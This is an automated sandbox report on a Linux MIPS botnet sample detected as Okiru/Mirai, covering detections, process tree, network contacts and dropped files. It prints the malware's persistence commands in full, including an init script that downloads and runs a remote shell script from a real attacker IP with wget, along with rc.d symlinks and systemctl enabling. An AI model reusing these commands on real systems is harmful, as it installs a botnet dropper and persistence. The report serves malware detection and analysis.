Edit tour

Linux Analysis Report
mips.nn.elf

Overview

General Information

Sample name:	mips.nn.elf
Analysis ID:	1581267
MD5:	b43eadaccd79fac89cfb6756648c8385
SHA1:	5c91f020cac556540011e39d131faf1dc822ea0d
SHA256:	614ea3b191e68720cbc5bc854f8b0e0c5a7dd106230d56172201bb82d6ed4a80
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581267
Start date and time:	2024-12-27 09:18:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mips.nn.elf
Detection:	MAL
Classification:	mal84.spre.troj.evad.linELF@0/10@0/0

Warnings

VT rate limit hit for: http://94.156.227.229/
VT rate limit hit for: http://94.156.227.229/lol.sh
VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Runtime Messages

Command:	/tmp/mips.nn.elf
PID:	5505
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Gorilla Botnet Cats Came After You!
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 5475, Parent: 3634)

rm (PID: 5475, Parent: 3634, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf

dash New Fork (PID: 5476, Parent: 3634)

rm (PID: 5476, Parent: 3634, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf

mips.nn.elf (PID: 5505, Parent: 5404, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.nn.elf

mips.nn.elf New Fork (PID: 5520, Parent: 5505)

sh (PID: 5520, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5530, Parent: 5520)

systemctl (PID: 5530, Parent: 5520, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

mips.nn.elf New Fork (PID: 5546, Parent: 5505)

sh (PID: 5546, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5548, Parent: 5546)

chmod (PID: 5548, Parent: 5546, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

mips.nn.elf New Fork (PID: 5549, Parent: 5505)

sh (PID: 5549, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5551, Parent: 5549)

ln (PID: 5551, Parent: 5549, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

mips.nn.elf New Fork (PID: 5552, Parent: 5505)

sh (PID: 5552, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"

mips.nn.elf New Fork (PID: 5554, Parent: 5505)

sh (PID: 5554, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 5556, Parent: 5554)

chmod (PID: 5556, Parent: 5554, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mips.nn.elf

mips.nn.elf New Fork (PID: 5557, Parent: 5505)

sh (PID: 5557, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5559, Parent: 5557)

mkdir (PID: 5559, Parent: 5557, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

mips.nn.elf New Fork (PID: 5560, Parent: 5505)

sh (PID: 5560, Parent: 5505, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 5562, Parent: 5560)

ln (PID: 5562, Parent: 5560, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf

mips.nn.elf New Fork (PID: 5563, Parent: 5505)

mips.nn.elf New Fork (PID: 5565, Parent: 5563)

mips.nn.elf New Fork (PID: 5567, Parent: 5563)

udisksd New Fork (PID: 5517, Parent: 803)

dumpe2fs (PID: 5517, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5544, Parent: 5543)

snapd-env-generator (PID: 5544, Parent: 5543, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5577, Parent: 803)

dumpe2fs (PID: 5577, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5632, Parent: 803)

dumpe2fs (PID: 5632, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5633, Parent: 803)

dumpe2fs (PID: 5633, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mips.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5505.1.00007fc020400000.00007fc02041c000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: mips.nn.elf PID: 5505	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

String: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.14:51358 -> 94.156.227.234:38242

Source: /tmp/mips.nn.elf (PID: 5505)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: mips.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: system.16.dr, inittab.16.dr, profile.16.dr, custom.service.16.dr, mips.nn.elf.34.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: mips.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofi

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/mips.nn.elf (PID: 5505)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/mips.nn.elf (PID: 5505)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5551)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5562)	File: /etc/rc.d/S99mips.nn.elf -> /etc/init.d/mips.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/mips.nn.elf (PID: 5505)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5548)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5556)	File: /etc/init.d/mips.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5680/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5670/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5681/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5671/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5672/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5673/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5674/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5664/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5323/cmdline	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5675/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5632/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5665/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5676/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5633/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5666/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5677/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5667/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5678/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5668/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5679/status	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5565)	File opened: /proc/5669/status	Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5520)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5546)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5549)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5552)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5554)	Shell command executed: sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5557)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mips.nn.elf (PID: 5560)	Shell command executed: sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5548)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5556)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mips.nn.elf			Jump to behavior

Source: /bin/sh (PID: 5559)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 5475)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf			Jump to behavior
Source: /usr/bin/dash (PID: 5476)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf			Jump to behavior

Source: /bin/sh (PID: 5530)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5505)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5548)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5556)	File: /etc/init.d/mips.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5505)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/mips.nn.elf (PID: 5505)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5552)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mips.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/mips.nn.elf (PID: 5505)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5552)	File: /etc/init.d/mips.nn.elf			Jump to dropped file

Sample deletes itself

Source: /tmp/mips.nn.elf (PID: 5567)

File: /tmp/mips.nn.elf

Jump to behavior

Source: /tmp/mips.nn.elf (PID: 5505)

Queries kernel information via 'uname':

Jump to behavior

Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.EgVH5u\
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: t-1/qemu-binfmt/mips/usQ`
Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: %s/qemu-op
Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: /qemu-binfmt/mips/usQ
Source: mips.nn.elf, 5505.1.0000558c36b0c000.0000558c36bb4000.rw-.sdmp	Binary or memory string: U!/usr/bin/vmtoolsd
Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.EgVH5u
Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.nn.elf
Source: mips.nn.elf, 5505.1.00007ffec3e54000.00007ffec3e75000.rw-.sdmp	Binary or memory string: MPDIR%s/qemu-op

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5505.1.00007fc020400000.00007fc02041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mips.nn.elf PID: 5505, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5505.1.00007fc020400000.00007fc02041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mips.nn.elf PID: 5505, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mips.nn.elf	37%	Virustotal		Browse
mips.nn.elf	34%	ReversingLabs	Linux.Backdoor.Mirai
mips.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe
http://94.156.227.229/	0%	Avira URL Cloud	safe
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	mips.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	mips.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	system.16.dr, inittab.16.dr, profile.16.dr, custom.service.16.dr, mips.nn.elf.34.dr, bootcmd.16.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.227.234	unknown	Bulgaria		57463	NETIXBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.156.227.234	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETIXBG	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.619758779643291
Encrypted:	false
SSDEEP:	3:KPJRXaLOFDDoCvLdjX43LbaaFOdFXa5O:WJRAqfoYZX47baaeXCO
MD5:	681EA3221C0A2AE247EF4E083E3CAAED
SHA1:	F4F3196D3F77C0B86535C93D533DB679C2CFA392
